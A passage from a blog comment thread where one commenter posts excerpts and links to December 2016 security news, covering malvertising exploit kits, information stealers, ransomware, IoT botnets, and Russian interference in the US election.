The expert has been tasked with finding vulnerabilities in OpenVPN 2.4, which is currently a release candidate (rc1). Green will analyze the source code available on GitHub and the results will be compared to the final version of OpenVPN 2.4.
Private Internet Access will make the results of the audit public, but not before ensuring that OpenVPN patches the vulnerabilities discovered by Green.
“The OpenVPN 2.4 audit is important for the entire community because OpenVPN is available on almost every platform and is used in many applications from consumer products such as Private Internet Access VPN to business software such as Cisco AnyConnect,” explained Caleb Chen of Private Internet Access.
Tomi Engdahl says:
Massive Stealthy Malvertising Campaign Uncovered
http://www.securityweek.com/massive-stealthy-malvertising-campaign-uncovered
A stealthy malvertising campaign has been flying under the radar for the last few months, targeting millions of readers visiting popular and mainstream news sites. The campaign is notable for stealth bordering on paranoia from the threat group, probably AdGholas.
In July 2016, Proofpoint published an analysis of a massive AdGholas malvertising campaign that it described as “using a sophisticated combination of techniques including sophisticated filtering and steganography.” It added that AdGholas had ceased operation following exposure, but “the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising.”
Now it appears that AdGholas simply changed tactics, and within a couple of months launched a new campaign described in an ESET research paper published yesterday
Readers of popular websites targeted by stealthy Stegano exploit kit hiding in pixels of malicious ads
http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/
Millions of readers who visited popular news websites have been targeted by a series of malicious ads redirecting to an exploit kit exploiting several Flash vulnerabilities. Since at least the beginning of October, users might have encountered ads promoting applications calling themselves “Browser Defence” and “Broxu” using banners similar to the ones below:
These advertisement banners were stored on a remote domain with the URL hxxps://browser-defence.com and hxxps://broxu.com.
Without requiring any user interaction, the initial script reports information about the victim’s machine to the attacker’s remote server. Based on server-side logic, the target is then served either a clean image or its almost imperceptibly modified malicious evil twin.
The malicious version of the graphic has a script encoded in its alpha channel
Using the known Internet Explorer vulnerability CVE-2016-0162, the encoded script attempts to verify that it is not being run in a monitored environment such as a malware analyst’s machine.
The landing page loads a Flash file that is able to exploit three different vulnerabilities (CVE-2015-8651, CVE-2016-1019, CVE-2016-4117)
Upon successful exploitation, the executed shell code collects information on installed security products and performs – as paranoid as the cybercriminals behind this attack – yet another check to verify that it is not being monitored. If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.
The payload is then decrypted and launched via regsvr32.exe or rundll32.exe. Payloads detected so far include backdoors, banking trojans, spyware, file stealers and various trojan downloaders.
An earlier variant of this stealthy exploit pack has been hiding in plain sight since at least late 2014, when we spotted it targeting Dutch customers. In spring 2015 the attackers focused on the Czech Republic and now they have shifted their focus onto Canada, Britain, Australia, Spain and Italy.
In the vast majority of the cases, the advertisement was promoting a product called “Browser Defence” and it has been only recently when we started to detect banners promoting the software “Broxu”.
Tomi Engdahl says:
ThyssenKrupp Hit by Hackers Eyeing Industrial Secrets
http://www.securityweek.com/thyssenkrupp-hit-hackers-eyeing-industrial-secrets
German heavy industry giant ThyssenKrupp said Thursday it fell victim to a hacking attack in which the perpetrators sought to steal company secrets.
Hackers believed to be from Southeast Asia were trying to obtain “technological know-how and research results” from the steel conglomerate, said a company spokesman, confirming a report in the Wirschaftswoche weekly.
“The attack is over and had been repelled,” he added.
The “massive cyber attack” had targeted divisions dealing with orders planning of industrial plants and steel works in Europe.
Highly protected parts of the company such as ThyssenKrupp Marine Systems or the IT control systems of the group’s blast furnaces and power plants were not affected.
ThyssenKrupp Marine builds warships including submarines for the German and Israeli navies.
There was no sign of data manipulation or sabotage, it added
Tomi Engdahl says:
August Stealer Uses PowerShell for Fileless Infection
http://www.securityweek.com/august-stealer-uses-powershell-fileless-infection
A new information stealing piece of malware called “August” is using Word documents containing malicious macros and is abusing PowerShell for a fileless infection, Proofpoint security researchers warn.
The malware is being distributed by TA530, an actor already known to be involved in highly personalized campaigns. The August distribution campaign, researchers say, was targeting customer service and managerial staff at retailers in an attempt to steal credentials and sensitive documents from the compromised machines.
However, as soon as the recipient opened the document, they would be prompted to enable the macros, which in turn would launch a PowerShell command to download and install the August stealer on the machine. The malicious payload is downloaded from a remote site as a PowerShell byte array, along with a few lines of code to deobfuscate the array through an XOR operation.
Tomi Engdahl says:
Experts Propose Cybersecurity Strategy for Nuclear Facilities
http://www.securityweek.com/experts-propose-cybersecurity-strategy-nuclear-facilities
Institutionalizing cybersecurity, reducing complexity, active defenses and transformative research should be a priority in reducing the risk of damaging cyberattacks at nuclear facilities, according to the Nuclear Threat Initiative (NTI).
While the Stuxnet attacks aimed at Iran are the most well-known, nuclear facilities in Germany and South Korea have also been hit by cyberattacks. European Union officials have also raised concerns about the possibility of attacks against Belgium’s nuclear plants.
Reports published in the past months warned that countries are not prepared to handle attacks targeting their nuclear facilities, and the nuclear industry still underestimates cyber security risk.
A report published on Wednesday by the NTI provides a set of recommendations for improving cyber security at nuclear facilities based on a 12-month analysis conducted by an international group of technical and operational experts.
One of the most important priorities involves institutionalizing cybersecurity. Specifically, nuclear facilities should learn from their safety and physical security programs and integrate these practices into their cybersecurity programs.
Another priority should be active defenses. Experts pointed out that a determined adversary will likely be capable of breaching the systems of a nuclear facility and organizations must be prepared to efficiently respond to such incidents.
Reducing the complexity of digital systems should also be a priority for nuclear facilities. Experts recommend minimizing the complexity of digital systems and even replacing them with non-digital or secure-by-design products.
Finally, the NTI recommends conducting transformative research with the goal of developing hard-to-hack systems for critical applications.
“Today’s defenses are no longer adequate, and a fresh look at how to best protect nuclear facilities from cyberattack is needed,” experts wrote in the NTI report. “The threat is too great, and the potential consequences are too high, to remain comfortable with the status quo.”
Tomi Engdahl says:
Homeland Security tied to attempted hack of Georgia’s election database: Report
http://www.cnbc.com/2016/12/08/homeland-security-tied-to-attempted-hack-of-georgias-election-database-report.html
An attempted hack into Georgia’s voter registration database was traced back to the Department of Homeland Security, The Wall Street Journal reported Thursday.
A third-party security firm working for the state detected the unsuccessful breach and linked it to an IP address associated with DHS, the report said. Georgia Secretary of State Brian Kemp reportedly sent a letter to Homeland Security asking the department to confirm whether an attempt was made.
In his letter, The Wall Street Journal reported, Kemp asked the department to confirm whether a scan attempt was made, who authorized the scan and whether the department was scanning other state systems without authorization.
Georgia Says Someone in U.S. Government Tried to Hack State’s Computers Housing Voter Data
http://www.wsj.com/articles/georgia-reports-attempt-to-hack-states-election-database-via-ip-address-linked-to-homeland-security-1481229960
Unsuccessful intrusion came on Nov. 15 apparently via Department of Homeland Security IP address
Tomi Engdahl says:
Georgia says it’s traced an attempted voter hack to the Department of Homeland Security
http://www.pcworld.com/article/3148710/security/georgia-says-its-traced-an-attempted-voter-hack-to-dhs.html
An IP address from the agency was the source of an attempted breach of the state’s voter registration database, according to Georgia’s secretary of state.
Georgia’s secretary of state says the state was hit with an attempted hack of its voter registration database from an IP address linked to the federal Department of Homeland Security.
The allegation by Georgia Secretary of State Brian Kemp is one of the more bizarre charges to come up in the recent spate of alarms about voting-system hacks. He said in a Facebook post on Thursday that he had been made aware of the failed attempt to breach the firewall protecting Georgia’s voter registration database. The attack was traced to an Internet Protocol address associated with DHS, he said.
“This morning I sent a letter to DHS Secretary Jeh Johnson demanding to know why,” he said in the post.
https://www.facebook.com/BrianKempGA/?hc_ref=PAGES_TIMELINE&fref=nf
Tomi Engdahl says:
16 year old hacked DHS system – how can they secure US elections?
http://www.newstarget.com/2016-09-14-16-year-old-hacked-dhs-system-how-can-they-secure-us-elections.html
DHS in particular, is even capable of protecting state balloting systems when it can’t protect it’s own data from being hacked?
Because if you do believe that they are capable — you shouldn’t.
“We should carefully consider whether our election system, our election process, is critical infrastructure like the financial sector, like the power grid,” Johnson said in recent days. But, as pointed out by We Are Change web site, DHS was hacked recently, and by a 16-year-old kid from England.
As further reported by Fox News in February, the 16-year-old boy managed to hack into systems belonging to both DHS and the FBI, breaching the email accounts CIA Director John Brennan and DHS’ Johnson.
The hacker told the online webzine Motherboard that he stole names, titles and contact information for 20,000 FBI employees and 9,000 DHS workers. He said the hack was possible using a compromised Justice Department email.
Hacker Plans to Dump Alleged Details of 20,000 FBI, 9,000 DHS Employees
http://motherboard.vice.com/read/hacker-plans-to-dump-alleged-details-of-20000-fbi-9000-dhs-employees
Tomi Engdahl says:
Hacker Lexicon: A Guide to Ransomware, the Scary Hack That’s on the Rise
https://www.wired.com/2015/09/hacker-lexicon-guide-ransomware-scary-hack-thats-rise/
Ransomware is malware that locks your keyboard or computer to prevent you from accessing your data until you pay a ransom, usually demanded in Bitcoin. The digital extortion racket is not new—it’s been around since about 2005, but attackers have greatly improved on the scheme with the development of ransom cryptware, which encrypts your files using a private key that only the attacker possesses, instead of simply locking your keyboard or computer.
Tomi Engdahl says:
Obama Has a Plan to Fix Cybersecurity, But Its Success Depends on Trump
https://www.wired.com/2016/12/obama-cybersecurity-plan/
https://www.whitehouse.gov/sites/default/files/docs/cybersecurity_report.pdf
Tomi Engdahl says:
Panel to Trump: Train 100,000 hackers
http://money.cnn.com/2016/12/02/technology/commission-on-enhancing-national-cybersecurity/
The incoming Trump administration is being advised to train 100,000 hackers.
The new president should also make an effort to develop international norms for hacking, essentially drawing red lines to avoid cyber warfare or even armed conflict.
President Obama’s special Commission on Enhancing National Cybersecurity released its long-awaited report Friday night.
Train 100,000 cybersecurity specialists by 2020
This is a huge number that some cybersecurity experts think is unrealistic. There’s currently a severe shortage of computer scientists who know how to hack — and to defend from hackers.
As a result, salaries are skyrocketing, making it even harder for the government to hire cybersecurity experts. In fact, lots of the talented hackers at the FBI and NSA are leaving for the private sector. It’s something FBI Director James Comey has voiced concern about.
Still, the Trump administration is being advised to create a “national cybersecurity workforce program” that would deliver lots of experts to businesses and government agencies across the country.
Develop international norms for hacking before it’s too late
Cybersecurity experts are particularly keen on this idea. Many have voiced concern that countries are breaking into each others’ computer systems recklessly, putting us at risk of situations that could lead to armed conflict.
“I’m greatly concerned that cyber conflict is the most escalatory kind of warfare we’ve come across,”
Take a closer look at product liability when devices are hackable
Currently, we’re experiencing what cybersecurity expert Joshua Corman has called a “market failure.”
Lots of internet-connected devices have little or no security. But low-end device manufacturers currently have little incentive to spend the extra money to make products secure. And buyers aren’t paying attention.
Other recommendations
The Trump administration is also being advised to issue a “national cybersecurity strategy” in the first six months of his term, and appoint a new “cyber adviser” and “cyber ambassador.”
Most cybersecurity experts say the recommendations are mostly good.
“I think this would be a great start,” said Randy V. Sabett, a Washington lawyer who sat on the last commission that advised President Obama at the start of his presidency.
Tomi Engdahl says:
Jeff Mason / Reuters:
Obama orders US intelligence agencies to conduct a full review of cyber attacks in the 2016 election, and deliver a report before he leaves office
Obama orders review of cyber attacks on 2016 election: adviser
http://www.reuters.com/article/us-usa-election-cyber-idUSKBN13Y1U7
U.S. President Barack Obama ordered intelligence agencies to review cyber attacks and foreign intervention into the 2016 election and deliver a report before he leaves office on Jan. 20, homeland security adviser Lisa Monaco said on Friday.
Monaco told reporters the results of the report would be shared with lawmakers and others.
“The president has directed the intelligence community to conduct a full review of what happened during the 2016 election process … and to capture lessons learned from that and to report to a range of stakeholders, to include the Congress,” Monaco said during an event hosted by the Christian Science Monitor.
Monaco said cyber attacks were not new but might have crossed a “new threshold” this year.
“We’ve seen in 2008 and in this last election system malicious cyber activity,”
Tomi Engdahl says:
David E. Sanger / New York Times:
Sources: Russia hacked Republican National Committee’s systems too but didn’t release data, US intelligence agencies have concluded with “high confidence” — Washington — President Obama has ordered American intelligence agencies to produce a full report on Russian efforts …
Russia Hacked Republican Committee but Kept Data, U.S. Concludes
http://www.nytimes.com/2016/12/09/us/obama-russia-election-hack.html
American intelligence agencies have concluded with “high confidence” that Russia acted covertly in the latter stages of the presidential campaign to harm Hillary Clinton’s chances and promote Donald J. Trump, according to senior administration officials.
They based that conclusion, in part, on another finding — which they say was also reached with high confidence — that the Russians hacked the Republican National Committee’s computer systems in addition to their attacks on Democratic organizations, but did not release whatever information they gleaned from the Republican networks.
In the months before the election, it was largely documents from Democratic Party systems that were leaked to the public. Intelligence agencies have concluded that the Russians gave the Democrats’ documents to WikiLeaks.
“We now have high confidence that they hacked the D.N.C. and the R.N.C., and conspicuously released no documents”
It is unclear how many files were stolen from the Republican committee
The Russians were as surprised as everyone else at Mr. Trump’s victory, intelligence officials said. Had Mrs. Clinton won, they believe, emails stolen from the Democratic committee and from senior members of her campaign could have been used to undercut her legitimacy.
It is possible that in hacking into the Republican committee, Russian agents were simply hedging their bets.
The finding about the Republican committee is expected to be included in a detailed report of “lessons learned” that Mr. Obama has ordered intelligence agencies to assemble before he leaves office on Jan. 20. That report is intended, in part, to create a comprehensive history of the Russian effort to influence the election, and to solidify the intelligence findings before Mr. Trump is sworn in.
Intelligence officials and private cybersecurity companies believe that the Democratic National Committee was hacked by two different Russian cyberunits. One, called “Cozy Bear” or “A.P.T. 29”
The other, the G.R.U.-controlled unit known as “Fancy Bear,” or “A.P.T. 28,” is believed to have created two outlets on the internet, Guccifer 2.0 and DCLeaks, to make Democratic documents public. Many of the documents were also provided to WikiLeaks, which released them over many weeks before the Nov. 8 election.
The messages stolen from Republicans have drawn little attention because most are routine business emails
Tomi Engdahl says:
Jeff Mason / Reuters:
Obama orders US intelligence agencies to conduct a full review of cyber attacks in the 2016 election and deliver a report before he leaves office — U.S. President Barack Obama has ordered intelligence agencies to review cyber attacks and foreign intervention into the 2016 election and deliver …
Obama orders review of 2016 election cyber attacks
http://www.reuters.com/article/us-usa-election-cyber-idUSKBN13Y1U7
Karoun Demirjian / Washington Post:
Leading Senate Republicans are preparing to launch a wide-ranging probe into Russia’s alleged meddling in the US elections, despite Trump’s opposition — Leading Senate Republicans are preparing to launch a coordinated and wide-ranging probe into Russia’s alleged meddling in the U.S. elections …
Republicans ready to launch wide-ranging probe of Russia, despite Trump’s stance
https://www.washingtonpost.com/news/powerpost/wp/2016/12/08/republicans-ready-to-launch-wide-ranging-probe-of-russia-despite-trumps-stance/?utm_term=.0ec978733365
Leading Senate Republicans are preparing to launch a coordinated and wide-ranging probe into Russia’s alleged meddling in the U.S. elections and its potential cyberthreats to the military, digging deep into what they view as corrosive interference in the nation’s institutions.
Such an aggressive approach puts them on a direct collision course with President-elect Donald Trump, who downplays the possibility Russia had any role in the November elections — arguing that a hack of the Democratic National Committee emails may have been perpetrated by “some guy in his home in New Jersey.” The fracture could become more prominent after Trump is inaugurated and begins setting foreign policy. He has already indicated that the country should “get along” with Russia since the two nations have many common strategic goals.
Tomi Engdahl says:
Tim Moynihan / Wired:
How devices like Echo and Home record your voice and why, what they do with the data, and how to scrub those recordings
Alexa and Google Home Record What You Say. But What Happens to That Data?
https://www.wired.com/2016/12/alexa-and-google-record-your-voice/
If you got an Amazon Echo or Google Home voice assistant, welcome to a life of luxurious convenience. You’ll be asking for the weather, the news, and your favorite songs without having to poke around on your phone. You’ll be turning off lights and requesting videos from bed. The world is yours.
But you know what? That little talking cylinder is always listening to you. And not just listening, but recording and saving many of the things you say. Should you freak out? Not if you’re comfortable with Google and Amazon logging your normal web activity, which they’ve done for years. Hell, many other sites have also done it for years. Echo and Home simply continue the trend of saving a crumb trail of queries, except with snippets of your voice.
However, it’s still a reasonable concern for anyone worried about privacy. If you only use Chrome in “Incognito Mode,” put tape over your laptop camera, and worry about snoops sniffing your packets, a web-connected microphone in your home seems risky. It’s a fair thing to be unsettled about. But recording your voice is a major part of how voice assistants work. Here’s how devices like Echo and Home record your voice, why they do it, what they do with the data, and how to scrub those recordings.
How In-Home Voice Assistants Work
Whenever you make a voice request, Google Home and Alexa-enabled devices record or stream audio clips of what you say. Those files are sent to a server—the real brains of the operation—to process the audio and formulate a response. The recorded clips are associated to your user account, and that process is enabled by default.
Because their brains are located miles away, Echo and Home need an internet connection to work. They do have a very rudimentary education, though: The only spoken commands they understand on their own are “wake words” or “activation phrases,” things like “Alexa” or “OK Google.” Once you say those magic words, the voice assistants jump to life, capture your voice request, and sling it to their disembodied cloud brains over Wi-Fi.
That means their mics are listening to you even when you’re not requesting things from Alexa or Google. But those ambient conversations—the things you say before “Alexa” or “OK Google”—aren’t stored or sent over a network.
Why Do They Need to Eavesdrop?
Listening to what you say before a wake word is essential to the entire concept of wake words.
Is This Secure? Can Hackers Tap In and Listen To Me?
Nothing is impossible, but Amazon and Google both have security measures that prevent snoops from wiretapping your home. The audio zipping from your home to Amazon and Google’s data centers is encrypted, so even if your home network is compromised, it’s unlikely that the gadgets can be used as listening devices. A bigger risk is someone getting hold of your Amazon or Google password and seeing a log of your interactions online.
There are also simple measures you can take to prevent Echo and Home from listening to you when you don’t want them to. Each device has a physical mute button, which cuts off the mic completely.
What About Siri?
Siri records your queries too, but she doesn’t catalog them or provide access to the running list of requests. You can’t listen to your history of Siri interactions in Apple’s app universe.
While Apple logs and stores Siri queries
Well, How About Cortana?
Microsoft’s Cortana voice assistant on Windows 10 works a bit differently, but it still mirrors some of your personal information on servers. To customize your experience, Cortana uses a combination of cloud-stored data and on-device data.
What Happens To Your Recorded Audio Clips?
Google users can find everything they’ve asked for by visiting myactivity.google.com while they’re logged into their account. This query museum doesn’t just include voice requests. It also includes any Google searches, YouTube videos, and apps you’ve launched on Android, among other things. It’s all presented in a neat, searchable chronological stack.
How to Stop and Delete Voice Recordings in Google Home
There’s a hardware and a software way to silence Home’s microphone. The easy hardware method is to just tap the “Mute” button on the back of the device. Of course, the Assistant won’t record (or hear) your voice queries while mute is enabled.
How to Stop and Delete Voice Recordings in Alexa
Amazon’s Alexa app doesn’t let you stop recordings altogether, but just like Google Home, there’s a mute button on its Echo devices for temporary privacy.
Tomi Engdahl says:
Hacker Claims To Push Malicious Firmware Update to 3.2 Million Home Routers
https://motherboard.vice.com/read/hacker-claims-to-push-malicious-firmware-update-to-32-million-home-routers
One of the hackers who amassed a new massive army of zombie internet-connected devices that can launch disruptive cyberattacks—even by mistake—now claims to have taken control of 3.2 million home routers, taking advantage of a flaw that allowed anyone to connect to them.
On Monday, the cybercriminal, who calls himself BestBuy, claimed to have set up a server that would automatically connect to vulnerable routers and push a malicious firmware update to them. This, he said, would grant him persistent access and the ability to lock out the owners as well as internet providers and device manufacturers.
“They are ours, even after reboot. They will not accept any new firmware from [Internet Service Provider] or anyone, and connect back to us every time :),” BestBuy said in an online chat. “Bots that cannot die until u throw device into the trash.”
Yet, they all agreed that BestBuy’s story was plausible, and potentially really bad news for the routers’ owners as well as their internet providers.
“Jesus christ,” said Darren Martyn, a security researcher who’s been tracking the recent wave of cyberattacks coming from hacked Internet of Things devices infected with Mirai. “Assuming [the hackers] didn’t fuck up repacking the firmware, and they didn’t do anything spectacularly stupid when backdooring it, their firmware backdoors will probably work just fine.”
None of the security researchers I contacted, however, could find one of the hacked routers in the wild.
“[It] would mean patching firmware for each different model and possibly even for each ISP,” he told Motherboard in an online chat. “Some firmware takes 15 minutes to patch, other can take days. But it is easy to mess up.”
Tomi Engdahl says:
Ben Sisario / New York Times:
US Congress passes bill seeking to ban ticket-scalping bots by making it illegal to circumvent the security measures of ticketing websites — With public attention focused on the scourge of online ticket scalping, Congress has passed a bill outlawing bots, or computer programs that let users scoop …
Congress Moves to Curb Ticket Scalping, Banning Bots Used Online
http://www.nytimes.com/2016/12/08/business/media/ticket-scalping-bots-act.html
With public attention focused on the scourge of online ticket scalping, Congress has passed a bill outlawing bots, or computer programs that let users scoop up the best tickets and resell them at inflated prices.
But will this law be enough to tame an $8 billion secondary ticket market that is increasingly global?
On Wednesday, the House of Representatives passed the Better Online Ticket Sales Act, or BOTS Act, with bipartisan support, following the bill’s passage a week ago in the Senate. It will now go to the White House for President Obama’s signature.
“With this soon-to-be-new law that will eliminate ‘bots’ and slap hackers with a hefty fine, we can now ensure those who want to attend shows in the future will not have to pay outrageous, unfair prices,” Mr. Schumer said in a statement.
Tomi Engdahl says:
Creating hacks for online games could now earn you jail time in South Korea
http://www.pcgamer.com/south-korea-makes-cheating-in-online-games-an-actual-crime/
South Korea has taken a big step toward cracking down on cheating in online games by criminalizing the creation and distribution of aimbots, wall hacks, and anything else not allowed by a game’s terms of service. According to a PvPLive report, anyone convicted of doing so could face up to five years in prison (!) or $43,000 in fines.
The law apparently doesn’t target esports specifically, although that would seem to be its most obvious target, given how popular (and lucrative) they are, especially in South Korea. And game makers like Valve, Blizzard, and Riot will no doubt welcome the new law as another weapon to use in their fight against cheaters.
Even so, I don’t see how anyone could possibly consider this a good idea. We can’t properly judge without a full translation of the law, but criminalizing the creation of cheating software, as opposed to profiting in some specific way through cheating, potentially leads to all sorts of unintended consequences. It also opens up the door to abuse on the developer side of the equation. If anything that contravenes a game’s TOS is against the law, aren’t developers incentivized to load those terms with restrictive language? Modding of any sort, regardless of intent or result, could suddenly be forbidden, under penalty of law.
South Korea Passes Bill to Directly Punish Hack Makers
https://pvplive.net/c/south-korea-passes-bill-to-directly-punish-hack-ma
The South Korean parliament has passed an amendment to a law on promoting the gaming industry . Based on this law, manufacturing and distributing programs that are not allowed by the game company and its Terms of Service is now directly illegal.
That would include aimbotters, hacking programs, scripters, or anything not allowed by the ToS.
The punishment? A maximum of 5 years jail time or $43,000 in fines (50 million KRW).
Now gaming companies won’t have to rely on ‘indirect’ laws in order to sue and accuse hack/script makers and distributors – which should make life immensely easier for Riot Korea and Blizzard Korea.
Tomi Engdahl says:
Secret CIA assessment says Russia was trying to help Trump win White House
https://www.washingtonpost.com/world/national-security/obama-orders-review-of-russian-hacking-during-presidential-campaign/2016/12/09/31d6b300-be2a-11e6-94ac-3d324840106c_story.html?utm_term=.19178e78c978
The CIA has concluded in a secret assessment that Russia intervened in the 2016 election to help Donald Trump win the presidency, rather than just to undermine confidence in the U.S. electoral system, according to officials briefed on the matter.
Intelligence agencies have identified individuals with connections to the Russian government who provided WikiLeaks with thousands of hacked emails from the Democratic National Committee and others, including Hillary Clinton’s campaign chairman, according to U.S. officials.
U.S. investigating potential covert Russian plan to disrupt November elections
https://www.washingtonpost.com/world/national-security/intelligence-community-investigating-covert-russian-influence-operations-in-the-united-states/2016/09/04/aec27fa0-7156-11e6-8533-6b0b0ded0253_story.html?utm_term=.0a8e4ed4abcd
U.S. intelligence and law enforcement agencies are investigating what they see as a broad covert Russian operation in the United States to sow public distrust in the upcoming presidential election and in U.S. political institutions, intelligence and congressional officials said.
The aim is to understand the scope and intent of the Russian campaign, which incorporates cyber-tools to hack systems used in the political process, enhancing Russia’s ability to spread disinformation.
Tomi Engdahl says:
Russia intervened to help Trump win election: intelligence officials
http://www.reuters.com/article/us-usa-election-cyber-russia-idUSKBN13Z05B
U.S. intelligence analysts have concluded that Russia intervened in the 2016 election to help President-elect Donald Trump win the White House, and not just to undermine confidence in the U.S. electoral system, a senior U.S. official said on Friday.
U.S. intelligence agencies have assessed that as the 2016 presidential campaign progressed, Russian government officials devoted increasing attention to assisting Trump’s effort to win the election, the U.S. official familiar with the finding told Reuters on Friday night, speaking on condition of anonymity.
The president-elect’s transition office released a statement that exaggerated his margin of victory and attacked the U.S. intelligence community that Trump will soon command, but did not address the analysts’ conclusion.
“These are the same people that said Saddam Hussein has weapons of mass destruction,” the statement said. “The election ended a long time ago in one of the biggest Electoral College victories in history. It’s now time to move on and ‘Make America Great Again.’”
Tomi Engdahl says:
Germany sees rise in Russian propaganda, cyber attacks
http://www.reuters.com/article/us-germany-russia-idUSKBN13X15D
Germany’s domestic intelligence agency on Thursday reported a striking increase in Russian propaganda and disinformation campaigns aimed at destabilizing German society, and targeted cyber attacks against political parties.
“We see aggressive and increased cyber spying and cyber operations that could potentially endanger German government officials, members of parliament and employees of democratic parties,” Hans-Georg Maassen, head of the BfV spy agency, said in statement.
Tomi Engdahl says:
Cyber is still not taken seriously
Business kohto not clearly failed to take cyber threats seriously enough, says Deloitte’s research. CIO of the company’s management only sees cyber security cost or regulatory compliance. Attitude is also reflected in low level of investment.
Deloitte’s survey, business expectations and investments kyberturvallisuuteen are in great contrast with each other. Business Management expects IT managers the capability cyber immediately after the business process development, cost reduction and maintenance of IT systems.
One third of IT Director says that the business management sees cyber security only as a cost or regulatory compliance. This is also reflected in investments: 41 percent of CIOs believe that cybersecurity not invest enough in their organization. At the same time, almost half (45%) of IT managers expect that cyber security is a significant impact on the business of the organization over the next two years. Perhaps for the same reason 64% of IT managers expect to increase the technology budget to strengthen cyber security.
- When cyber threat or intrusion is realized, it is always a business problem, because it will harm, as well as business performance and reputation. CIO must help lead the business to understand what cyber safety and threats mean in practice
- Business management The customers are the most important thing, and this is a key role in cyber security. When an organization is able to demonstrate how it protects, for example, customer data against potential launch cyber-attacks, it strengthens customer confidence in the organization even further.
Source: http://etn.fi/index.php?option=com_content&view=article&id=5564:kyberuhkia-ei-vielakaan-oteta-vakavasti&catid=13&Itemid=101
Tomi Engdahl says:
NSA’s Best Are ‘Leaving In Big Numbers,’ Insiders Say
https://yro.slashdot.org/story/16/12/10/2148243/nsas-best-are-leaving-in-big-numbers-insiders-say
Low morale at the National Security Agency is causing some of the agency’s most talented people to leave in favor of private sector jobs, former NSA Director Keith Alexander told a room full of journalism students, professors and cybersecurity executives Tuesday. The retired general and other insiders say a combination of economic and social factors including negative press coverage — have played a part… “I am honestly surprised that some of these people in cyber companies make up to seven figures. That’s five times what the chairman of the Joint Chiefs of Staff makes. Right? And these are people that are 32 years old. Do the math. [The NSA] has great competition,” he said.
Tomi Engdahl says:
Security Experts Warn Congress That the Internet of Things Could Kill People
https://www.technologyreview.com/s/603015/security-experts-warn-congress-that-the-internet-of-things-could-kill-people/?utm_campaign=internal&utm_medium=homepage&utm_source=features_1
Poorly secured webcams and other Internet-connected devices are already being used as tools for cyberattacks. Can the government prevent this from becoming a catastrophic problem?
Tomi Engdahl says:
New Ransomware Offers The Decryption Keys If You Infect Your Friends
https://it.slashdot.org/story/16/12/12/0457218/new-ransomware-offers-the-decryption-keys-if-you-infect-your-friends
MalwareHunterTeam has discovered “Popcorn Time,” a new in-development ransomware with a twist. Gumbercules!! writes:
“With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key,” writes Bleeping Computer. Infected victims are given a “referral code” and, if two people are infected by that code and pay up — the original victim is given their decryption key (potentially).
New Scheme: Spread Popcorn Time Ransomware, get chance of free Decryption Key
https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/
Tomi Engdahl says:
IoT devices terrorize online: “In this we have been lazy, stupid or indifferent”
With the IoT is now going through the same phase as the time, the introduction of home PCs: basic users do not comprehend the need for security, Futurice expert Kirsi Louhelainen estimates.
IOT’s weak security was revealed in late October, when the DNS service provider network Dynin was a denial of service attack IoT devices kaapannutta Mirai-bot network.
Louhelainen, the solutions should come from manufacturers. For example, Mirai-botnet used the default passwords for devices that have not even been able to change. Technology security is not closed.
Source: http://www.tivi.fi/Kaikki_uutiset/iot-laitteet-hyokkailevat-verkossa-tassa-on-oltu-laiskoja-tyhmia-tai-valinpitamattomia-6606535
Tomi Engdahl says:
David E. Sanger / New York Times:
Sources: Russia hacked Republican National Committee’s systems too but didn’t release data, US intelligence agencies have concluded with “high confidence” — Washington — President Obama has ordered American intelligence agencies to produce a full report on Russian efforts …
Russian Hackers Acted to Aid Trump in Election, U.S. Says
http://www.nytimes.com/2016/12/09/us/obama-russia-election-hack.html
American intelligence agencies have concluded with “high confidence” that Russia acted covertly in the latter stages of the presidential campaign to harm Hillary Clinton’s chances and promote Donald J. Trump, according to senior administration officials.
They based that conclusion, in part, on another finding — which they say was also reached with high confidence — that the Russians hacked the Republican National Committee’s computer systems in addition to their attacks on Democratic organizations, but did not release whatever information they gleaned from the Republican networks.
Tomi Engdahl says:
Russia Says Thwarted Fresh Cyber Attacks on Major Banks
http://www.securityweek.com/russia-says-thwarted-fresh-cyber-attacks-major-banks
Russia’s telecom operator on Friday said that it had blocked a series of cyber attacks on the country’s leading banks this week, the latest to target the country’s financial sector.
Rostelecom said in a statement that it “successfully thwarted DDoS (distributed denial of service) on the five biggest banks and financial organisations in Russia” on December 5.
“The most sustained attack lasted more than two hours,” it said.
Tomi Engdahl says:
Most External PowerShell Scripts Are Malicious: Symantec
http://www.securityweek.com/most-external-powershell-scripts-are-malicious-symantec
PowerShell, the scripting language and shell framework that is installed by default on most Windows computers, is becoming a favored attack tool for malware infections. In fact, over 95% of scripts using PowerShell were found to be malicious, according to a new report from Symantec.
The flexibility of the framework allows attackers to abuse it to download malicious payloads, perform reconnaissance operations, or traverse across networks. And with 95.4% of the PowerShell scripts that Symantec analyzed being malicious, it’s clear that they represent a major threat to both consumers and businesses (especially when externally sourced PowerShell scripts are involved).
https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious
Tomi Engdahl says:
Zero to One Security Innovation
http://www.securityweek.com/zero-one-security-innovation
The increasing volume and sophistication of cyberattacks over the last few years has resulted in millions of dollars of investments in new cybersecurity startups, in more and more security tools created by cybersecurity companies and in huge investments in these new security solutions by enterprises.
To try get a handle on all these new tools, enterprises have needed to invest in more and more security employees to deploy, manage and analyze security data being generated –creating what we call a “big data problem.” An enormous investment in time and money managing these growing security forces naturally followed.
Although some will not admit it, these investments have by and large generated chaos where we need clarity and clumsiness where we need agility.
Although all security vendors and service providers are trying to innovate and develop new solutions that are more successful thwarting advanced threats, if we look at the success rate of attackers vs. dollars spent by the defenders, it seems that attackers are still innovating at a faster pace – the mouse seems to be scurrying faster than the cat in this cat and mouse game.
Here’s the crux of the problem: new security tools and features represent incremental innovation, not paradigmatic changes.
A true value innovation in the today’s cybersecurity arena should include three things:
• Simplicity in a world of complex, slow and static defense architectures
• A nimble, adaptive and programmable security apparatus (as opposed to a new product or product improvement)
• The ability to utilize crowd intelligence seamlessly
Zero to one innovations would entail that defenders put the cat ahead of the mouse, i.e. create security solutions faster than the attackers do, independent of security vendors.
Tomi Engdahl says:
Cyber Insurance Market to Top $14 Billion by 2022: Report
